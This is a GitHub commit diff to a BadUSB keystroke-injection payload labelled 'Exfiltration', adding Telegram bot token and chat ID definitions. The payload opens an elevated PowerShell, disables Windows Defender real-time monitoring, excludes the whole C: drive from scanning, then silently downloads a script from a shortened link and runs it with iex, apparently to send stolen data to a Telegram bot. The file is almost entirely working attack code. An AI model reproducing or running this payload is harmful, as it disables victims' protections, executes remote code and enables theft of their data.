Added DEFINE

pull/410/head
Mr. Proxy 2024-01-02 22:28:02 +01:00 committed by GitHub
parent a83f7c7a0e
commit 6c60e2dcd3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 1 deletions

View File

@ -7,10 +7,14 @@ REM Version: 1.0
REM Category: Exfiltration
REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
REM Here you will have to put your telegram bot details
DEFINE BOT_TOKEN your-bot-token
DEFINE CHAT_ID your-chat-id
DELAY 1500
GUI r
DELAY 500
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-token'; $ci='chat-id'; irm https://t.ly/-qlYd | iex'"
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='BOT_TOKEN'; $ci='CHAT_ID'; irm https://t.ly/-qlYd | iex'"
CTRL-SHIFT ENTER
DELAY 1000
ALT y